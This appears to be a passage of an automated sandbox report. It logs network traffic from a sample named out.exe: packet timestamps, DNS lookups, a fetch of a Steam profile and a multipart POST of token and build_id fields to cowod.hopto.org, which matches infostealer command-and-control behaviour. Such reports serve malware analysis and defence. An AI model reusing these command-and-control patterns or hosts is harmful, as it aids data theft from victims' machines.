                                                                                                                                                                                        Oct 7, 2024 20:35:45.770299911 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.775093079 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.775115013 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.775192976 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.775218964 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.775269032 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.793981075 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.793997049 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.794080019 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.794106960 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.794174910 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.812757015 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.812774897 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.812889099 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.812911034 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.812953949 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.822077036 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.822096109 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.822206974 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.822218895 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.822283983 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.830641985 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.830661058 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.830744028 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.830765009 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.830807924 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.844261885 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.844278097 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.844474077 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.844492912 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.844559908 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.845397949 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.845412016 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.845478058 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.845485926 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.845526934 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.854675055 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.854688883 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.854774952 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.854825020 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.854888916 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.859323025 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.859337091 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.859399080 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.859405041 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.859487057 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.878397942 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.878415108 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.878525972 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.878540039 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.878607988 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.897133112 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.897154093 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.897247076 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.897259951 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.897311926 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.906706095 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.906721115 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.906820059 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.906835079 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.906889915 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.915541887 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.915556908 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.915627956 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.915646076 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.915684938 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.929296017 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.929310083 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.929403067 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.929426908 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.929466963 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.930026054 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.930041075 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.930102110 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.930114031 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.930156946 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.940596104 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.940608978 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.940690994 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.940712929 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.940751076 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.943984032 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.943998098 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.944061995 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.944075108 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.944143057 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.988616943 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.988634109 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.988706112 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.988729000 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.988775015 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.989072084 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.270428896 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.270462036 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.278436899 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.278454065 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.278522968 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.278537035 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.278562069 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.278589964 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.281601906 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.281619072 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.281691074 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.281697035 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.283963919 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.326519966 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.326545000 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.326708078 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.326726913 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.327599049 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.327619076 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.327683926 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.327689886 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.327761889 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.327769041 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.338169098 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.338188887 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.338377953 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.338386059 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.338432074 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.343949080 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.343966007 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.344038963 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.344050884 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.344624996 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.351495981 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.351516962 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.351591110 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.351604939 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.351656914 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.354758978 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.354774952 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.354891062 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.354897976 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.354940891 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.363301039 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.363317013 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.363411903 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.363420010 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.363571882 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.366082907 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.366099119 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.366179943 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.366187096 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.366307020 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.411160946 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.411180019 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.411272049 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.411290884 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.411341906 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.412260056 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.412278891 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.412343025 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.412348986 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.412524939 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.422600985 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.422616005 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.422698975 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.422710896 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.422791004 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.428611994 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.428627014 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.428689957 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.428699017 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.429244995 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.435978889 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.435995102 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.436054945 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.436069012 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.436095953 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.436115026 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.439135075 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.439150095 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.439261913 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.439280033 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.439342022 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.447613955 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.447628975 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.447715044 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.447762966 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.448170900 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.450834036 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.450848103 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.450917959 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.450926065 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.451015949 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.495614052 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.495632887 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.495731115 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.495758057 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.495861053 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.496587038 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.496602058 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.496670961 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.496676922 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.496932983 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.507716894 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.507769108 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.507787943 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:46.507791042 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.507844925 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.508061886 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:46.508075953 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:58.420799017 CEST5000080192.168.2.545.132.206.251
                                                                                                                                                                                        Oct 7, 2024 20:35:58.426822901 CEST805000045.132.206.251192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:58.428035975 CEST5000080192.168.2.545.132.206.251
                                                                                                                                                                                        Oct 7, 2024 20:35:58.428196907 CEST5000080192.168.2.545.132.206.251
                                                                                                                                                                                        Oct 7, 2024 20:35:58.428252935 CEST5000080192.168.2.545.132.206.251
                                                                                                                                                                                        Oct 7, 2024 20:35:58.433329105 CEST805000045.132.206.251192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:58.433399916 CEST805000045.132.206.251192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:58.433489084 CEST805000045.132.206.251192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:58.433492899 CEST805000045.132.206.251192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:59.176146984 CEST805000045.132.206.251192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:59.176327944 CEST5000080192.168.2.545.132.206.251
                                                                                                                                                                                        Oct 7, 2024 20:36:02.421782970 CEST5000080192.168.2.545.132.206.251
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 20:35:18.359410048 CEST | 62770 | 53 | 192.168.2.5 | 1.1.1.1
Oct 7, 2024 20:35:18.366837025 CEST | 53 | 62770 | 1.1.1.1 | 192.168.2.5
Oct 7, 2024 20:35:58.409149885 CEST | 54021 | 53 | 192.168.2.5 | 1.1.1.1
Oct 7, 2024 20:35:58.419862032 CEST | 53 | 54021 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 7, 2024 20:35:18.359410048 CEST | 192.168.2.5 | 1.1.1.1 | 0x187d | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Oct 7, 2024 20:35:58.409149885 CEST | 192.168.2.5 | 1.1.1.1 | 0x90e9 | Standard query (0) | cowod.hopto.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 7, 2024 20:35:18.366837025 CEST | 1.1.1.1 | 192.168.2.5 | 0x187d | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 20:35:58.419862032 CEST | 1.1.1.1 | 192.168.2.5 | 0x90e9 | No error (0) | cowod.hopto.org | | 45.132.206.251 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                                        • 49.12.106.214
                                                                                                                                                                                        • cowod.hopto.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 50000 | 45.132.206.251 | 80 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 20:35:58.428196907 CEST | 281 | OUT | POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAK
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: cowod.hopto.org
                                                                                                                                                                                        Content-Length: 3193
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
Oct 7, 2024 20:35:58.428252935 CEST | 3193 | OUT
                                                                                                                                                                                        Data Ascii: ------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------HDAAAAFIIJDBGD
Oct 7, 2024 20:35:59.176146984 CEST | 188 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:59 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        X-Served-By: cowod.hopto.org


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49736 | 104.102.49.254 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:19 UTC | 119 | OUT | GET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
2024-10-07 18:35:19 UTC | 1870 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:19 GMT
                                                                                                                                                                                        Content-Length: 34889
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: sessionid=5a81f8cda4449a18554b5c56; Path=/; Secure; SameSite=None
                                                                                                                                                                                        Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-07 18:35:19 UTC | 14514 | IN
                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-07 18:35:20 UTC | 16384 | IN
                                                                                                                                                                                        Data Ascii: SUPPORT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSn
2024-10-07 18:35:20 UTC | 3768 | IN
                                                                                                                                                                                        Data Ascii: "profile_summary"></div><div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div>
2024-10-07 18:35:20 UTC | 223 | IN
                                                                                                                                                                                        Data Ascii: ack" onclick="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49752 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:21 UTC | 186 | OUT | GET / HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
2024-10-07 18:35:21 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:21 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
2024-10-07 18:35:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


